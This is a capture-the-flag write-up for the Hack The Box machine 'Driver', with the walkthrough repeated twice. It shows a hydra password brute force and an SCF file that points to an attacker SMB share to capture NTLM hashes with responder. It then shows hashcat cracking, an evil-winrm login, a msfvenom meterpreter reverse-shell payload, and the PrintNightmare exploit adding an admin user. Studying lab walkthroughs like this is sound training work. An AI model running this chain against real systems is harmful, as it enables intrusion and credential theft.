Hackthebox - Driver

Windows

Box on HTB

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -p- 10.10.11.106    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 19:37 EDT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-01T06:46:14
|_  start_date: 2022-05-01T06:42:07
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 7h07m35s, deviation: 0s, median: 7h07m34s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.54 seconds

Port 80

Inspecting with burp

The response header when trying to authenticate gives this (we can also see it in the nmap scan):

WWW-Authenticate: Basic realm="MFP Firmware Update Center. Please enter password for admin"

So we get username, we can try to bruteforce with hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get

┌──(root💀kali)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get                                                                                                                                                           255 ⨯
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-30 19:55:19
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.11.106:80/
[STATUS] 6124.00 tries/min, 6124 tries in 00:01h, 14338275 to do in 39:02h, 16 active
[STATUS] 6045.00 tries/min, 18135 tries in 00:03h, 14326264 to do in 39:30h, 16 active
[80][http-get] host: 10.10.11.106   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-30 19:58:36

So we have admin:admin credentials

There is a file upload functionality and it says it will go in the share. It bugged me for a while and then I remember the URL File attack So I uploaded this file

[Shell]
Command=2
IconFile=\\10.10.14.2\share\legit.ico
[Taskbar]
Command=ToggleDesktop

I named it with and @ at the begining for instance @csbygb
And then we need to launch responder with smb server on obviously responder -w --lm -v -I tun0
Now we just have to crack one of them with hashcat
We just need to copy a whole one like this tony::DRIVER:a05acd47ab1ac310:B15097FF39CD452C8F8E53BDC33B7B37:0101000000000000DF515CFA2F5DD801D1688BA244C5025400000000020000000000000000000000
And then launch hashcat as follow hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Let's see what shares we have

┌──(root💀kali)-[~/Documents/hackthebox/driver]
└─# smbclient -L //10.10.11.106 -U 'tony'                                                                                                                                                                                                1 ⨯
Enter WORKGROUP\tony's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.106 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

Let's get a shell with evil-winrm evil-winrm -i 10.10.11.106 -u tony -p liltony
It works! Let's grab our user flag in tony's desktop!

Privesc

Let's get winpeas and execute it in our target
In our kali wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/winPEASx64.exe
Now we just have to upload it in our target with evilwinrm it really easy we just need to type upload winPEASx64.exe
And we launch it .\winPEASx64.exe
If we google the specific driver we have a privesc vuln
Let's get a shell with msfconsole so that we can privesc using a metasploit module
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe -o reverse2.exe
in our evvilwinrm shell upload reverse.exe
I got annoyed with this exploit because I could not make it work
I decided to use printnightmare instead
- wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
- From evil winrm upload CVE-2021-1675.ps1
- Import-Module .\CVE-2021-1675.ps1
- Get-Command Invoke-Nightmare
- Invoke-Nightmare -NewUser "csbygb" -NewPassword "csbygb123!"
- Finally if we net user we see we are in the admin group net user csbygb
- Now we just need to use evil-winrm with our new user evil-winrm -i 10.10.11.106 -u csbygb -p csbygb123!
- And we can grab the admin flag
- cd C:\Users\Administrator\Desktop
- type root.txt

PreviousHackthebox - Devel NextHackthebox - Explore

Last updated 1 year ago

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -p- 10.10.11.106    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 19:37 EDT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-01T06:46:14
|_  start_date: 2022-05-01T06:42:07
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 7h07m35s, deviation: 0s, median: 7h07m34s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.54 seconds

Port 80

Inspecting with burp

The response header when trying to authenticate gives this (we can also see it in the nmap scan):

WWW-Authenticate: Basic realm="MFP Firmware Update Center. Please enter password for admin"

So we get username, we can try to bruteforce with hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get

┌──(root💀kali)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get                                                                                                                                                           255 ⨯
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-30 19:55:19
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.11.106:80/
[STATUS] 6124.00 tries/min, 6124 tries in 00:01h, 14338275 to do in 39:02h, 16 active
[STATUS] 6045.00 tries/min, 18135 tries in 00:03h, 14326264 to do in 39:30h, 16 active
[80][http-get] host: 10.10.11.106   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-30 19:58:36

So we have admin:admin credentials

There is a file upload functionality and it says it will go in the share. It bugged me for a while and then I remember the URL File attack So I uploaded this file

[Shell]
Command=2
IconFile=\\10.10.14.2\share\legit.ico
[Taskbar]
Command=ToggleDesktop

I named it with and @ at the begining for instance @csbygb

And then we need to launch responder with smb server on obviously responder -w --lm -v -I tun0

And we get hashes!

Now we just have to crack one of them with hashcat

We just need to copy a whole one like this tony::DRIVER:a05acd47ab1ac310:B15097FF39CD452C8F8E53BDC33B7B37:0101000000000000DF515CFA2F5DD801D1688BA244C5025400000000020000000000000000000000

And then launch hashcat as follow hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

And we get the password liltony

Let's see what shares we have

┌──(root💀kali)-[~/Documents/hackthebox/driver]
└─# smbclient -L //10.10.11.106 -U 'tony'                                                                                                                                                                                                1 ⨯
Enter WORKGROUP\tony's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.106 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

Let's use cracmapexec to see how we could use the creds

Let's get a shell with evil-winrm evil-winrm -i 10.10.11.106 -u tony -p liltony

It works! Let's grab our user flag in tony's desktop!

Privesc

Let's get winpeas and execute it in our target

In our kali wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/winPEASx64.exe

Now we just have to upload it in our target with evilwinrm it really easy we just need to type upload winPEASx64.exe

And we launch it .\winPEASx64.exe

Winpeas shows that there is a powershell history file

If we google the specific driver we have a privesc vuln

Let's get a shell with msfconsole so that we can privesc using a metasploit module

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe -o reverse2.exe

in our evvilwinrm shell upload reverse.exe

I got annoyed with this exploit because I could not make it work

I decided to use printnightmare instead

wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
From evil winrm upload CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Get-Command Invoke-Nightmare
Invoke-Nightmare -NewUser "csbygb" -NewPassword "csbygb123!"
Finally if we net user we see we are in the admin group net user csbygb
Now we just need to use evil-winrm with our new user evil-winrm -i 10.10.11.106 -u csbygb -p csbygb123!
And we can grab the admin flag
cd C:\Users\Administrator\Desktop
type root.txt